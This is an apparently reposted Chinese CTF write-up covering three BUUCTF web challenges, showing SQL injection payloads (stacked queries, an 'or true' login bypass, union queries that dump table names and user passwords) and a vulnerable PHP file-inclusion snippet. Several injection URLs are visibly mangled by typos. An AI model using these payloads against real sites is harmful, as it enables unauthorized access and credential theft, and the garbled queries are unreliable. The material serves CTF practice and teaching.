BUUCTF-WEB2

这篇具有很好参考价值的文章主要介绍了BUUCTF-WEB2。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

[SUCTF 2019]EasySQL1

BUUCTF-WEB2,ctf,sql,网络安全

1.启动靶机

BUUCTF-WEB2,ctf,sql,网络安全

2.寻找注入点和注入方法

随便输入一个字母,没有回显

BUUCTF-WEB2,ctf,sql,网络安全

随便输入一个数字,发现有回显,并且回显结果一样

BUUCTF-WEB2,ctf,sql,网络安全

3.堆叠注入

1; show databases;     #查看数据库

BUUCTF-WEB2,ctf,sql,网络安全

1; show tables;    #查看数据表

里面有个flag

BUUCTF-WEB2,ctf,sql,网络安全

1;set sql_mode=PIPES_AS_CONCAT;select 1

1;:这个部分是一个 SQL 查询的结束符号。在 MySQL 中,分号用于结束 SQL 语句
set sql_mode=PIPES_AS_CONCAT;:是一个 SQL 语句,用于设置 MySQL 数据库的 SQL 模式为 PIPES_AS_CONCAT,这个设置可能是为了改变 SQL 的连接操作符行为,将竖线(|)视为字符串连接符而不是按位或运算符
select 1:一个简单的 SQL 查询,选择值为 1 的列

BUUCTF-WEB2,ctf,sql,网络安全

4.得到flag

BUUCTF-WEB2,ctf,sql,网络安全

[极客大挑战 2019]Secret File1

BUUCTF-WEB2,ctf,sql,网络安全

1.启动靶机

BUUCTF-WEB2,ctf,sql,网络安全

2.查看源码

右键查看源代码

BUUCTF-WEB2,ctf,sql,网络安全

BUUCTF-WEB2,ctf,sql,网络安全

右键查看源代码

BUUCTF-WEB2,ctf,sql,网络安全

BUUCTF-WEB2,ctf,sql,网络安全

并查看源代码

BUUCTF-WEB2,ctf,sql,网络安全

3.burp suite

利用抓包工具,抓取跳转的页面

发现一个secr3t.php

BUUCTF-WEB2,ctf,sql,网络安全

访问secr3t.php,提示放在了flag.php中

BUUCTF-WEB2,ctf,sql,网络安全

访问flag.php

BUUCTF-WEB2,ctf,sql,网络安全

4.代码分析

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

第12行代码中的include函数说明secr3t.php存在文件包含漏洞

第8行代码没有过滤filter,所以我们可以直接使用php伪协议读取flag.php

BUUCTF-WEB2,ctf,sql,网络安全

5.随波逐流base64解密

将得到的一堆base64放到随波逐流工具中进行解密

BUUCTF-WEB2,ctf,sql,网络安全

6.得到flag

BUUCTF-WEB2,ctf,sql,网络安全

[极客大挑战 2019]LoveSQL1

BUUCTF-WEB2,ctf,sql,网络安全

1.启动靶机

BUUCTF-WEB2,ctf,sql,网络安全

2.万能密码

用万能密码,用户是a' or true # ,这里我输的密码是123(可以输任何密码)

BUUCTF-WEB2,ctf,sql,网络安全

登录

BUUCTF-WEB2,ctf,sql,网络安全

F12,可以看到是以get方式传参

BUUCTF-WEB2,ctf,sql,网络安全

3.测试是否有注入点

http://f99a1e2d-3f5d-4aff-a8fc-404d75c9b59e.node5.buuoj.cn:81/check.php?username=1' order by 1%23&password=123

BUUCTF-WEB2,ctf,sql,网络安全

order by 4的时候报错

BUUCTF-WEB2,ctf,sql,网络安全

可以判断出有三个字段

4.寻找注入点

利用联合查询,寻找注入点

http://f99a1e2d-3f5d-4aff-a8fc-404d75c9b59e.node5.buuoicn:81/check,php?username=1'unionselect 1.2.3%23&password=123

说明注入点是2,3

BUUCTF-WEB2,ctf,sql,网络安全

5.注入

通过联合查询

http://f99a1e2d-3f5d-4aff-a8fc-404d75c9b59e.node5.buuoj.cn:81/check,php?usemame=1' union select 1,database(),3%23&password=123

得到一个名为geek的数据库

BUUCTF-WEB2,ctf,sql,网络安全

通过联合查询从数据库中获取表名的列表

http://f99a1e2d-3f5d-4aff-a8fc-404d75c9b59e.node5.buuoj.cn:81/check.php?username=1'union select 1,database(),group concat(table name) from infommation schema.tables wheretable schema=database()%23&password=123

BUUCTF-WEB2,ctf,sql,网络安全

获取敏感数据,包括用户表中的用户 ID、用户名和密码

http://f99a1e2d-3f5d-4aff-a8fc-404d75c9b59e.node5.buuoj.cn:81/check,php?usermame=1'union select1,database(),group concat(id,username,password) from l0ve1ysg1%23&password=123

BUUCTF-WEB2,ctf,sql,网络安全

6.得到flag

BUUCTF-WEB2,ctf,sql,网络安全文章来源地址https://www.toymoban.com/news/detail-860885.html

到了这里,关于BUUCTF-WEB2的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [网络安全/CTF] BUUCTF极客大挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)

    提示:有一个良好的备份网站的习惯 故使用dirsearch工具扫描目录 得到的扫描结果中包含www.zip目录 通过url路径下载zip文件: index.php中含有关键代码: Get传参传入一个参数select,后端将其序列化 class.php: construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,

    2024年02月05日
    浏览(55)
  • 网络安全CTF之Web基础

    Web类的考试,在CTF比赛中十分常见。 本人从计算机专业转网络安全发展,属于半路出家,一知半解,如有总结不到位的地方,欢迎交流分享。 攻防世界Web Web基础中,常见的考点如下: 1、源代码隐藏 打开网页,显示 FLAG is not here。 F12查看源代码,取得flag 2、GET和POST传参 G

    2024年02月07日
    浏览(36)
  • CTF Web SQL注入专项整理(持续更新中)

    SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据

    2024年01月20日
    浏览(29)
  • [CTF/网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)

    这段代码首先通过 show_source(__FILE__) 显示当前文件的源代码,然后通过 $_GET[\\\'hello\\\'] 显示 URL 参数中名为 hello 的值。 接下来,代码使用 $_GET[\\\'page\\\'] 获取 URL 参数中名为 “page” 的值,并进行字符串替换,将 php:// 替换为空字符串 这是为了防止通过 URL 参数加载本地文件或其他可

    2024年02月08日
    浏览(34)
  • 网络安全、夺旗赛(CTF)技能汇总_ctf夺旗赛

    本文综合博主参赛准备经历,总结介绍了过程中了解的网络安全、夺旗赛(CTF)相关知识及资源,分为资料篇、工具篇、解题思路篇。 资料篇 CTF Wiki 对CTF整体介绍,各个方向的介绍,有例题,入门必备。 CTF工具集合 集成了工具资源,方便下载。 如果你对网络安全入门感兴

    2024年02月07日
    浏览(36)
  • 网络安全CTF比赛有哪些事?——《CTF那些事儿》告诉你

    目录 前言 一、内容简介 二、读者对象  三、专家推荐  四、全书目录   CTF比赛是快速提升网络安全实战技能的重要途径,已成为各个行业选拔网络安全人才的通用方法。但是,本书作者在从事CTF培训的过程中,发现存在几个突出的问题: 1)线下CTF比赛培训中存在严重的

    2024年02月08日
    浏览(40)
  • 什么是CTF?打CTF的意义是什么?(附网络安全入门教程)

    什么是CTF? CTF在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。它起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十

    2024年02月13日
    浏览(31)
  • CTF网络安全大赛详情

    网络安全已成为现代社会的一个关键挑战,随着互联网技术的飞速发展,从个人隐私保护到国家安全,网络安全的重要性日益突显。为了应对这一挑战,CTF(Capture The Flag,中文:夺旗赛)应运而生,成为全球网络安全领域中一种非常流行的信息安全竞赛形式。 CTF赛事起源与

    2024年04月26日
    浏览(58)
  • CTF网络安全大赛介绍

    CTF竞赛模式分为以下三类: 一、解题模式(Jeopardy)在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏

    2024年02月13日
    浏览(34)
  • 网络安全CTF工具合集

    各种在线工具以及工具整合 CTF资源库|CTF工具下载|CTF工具包|CTF工具集合 逆向工程: GDB – http://www.gnu.org/software/gdb/download/ IDA Pro – Download center Immunity Debugger – http://debugger.immunityinc.com/ OllyDbg – OllyDbg v1.10 radare2 – radare Hopper – Hopper - Download nm – unix/linux tool objdump – lin

    2024年02月06日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包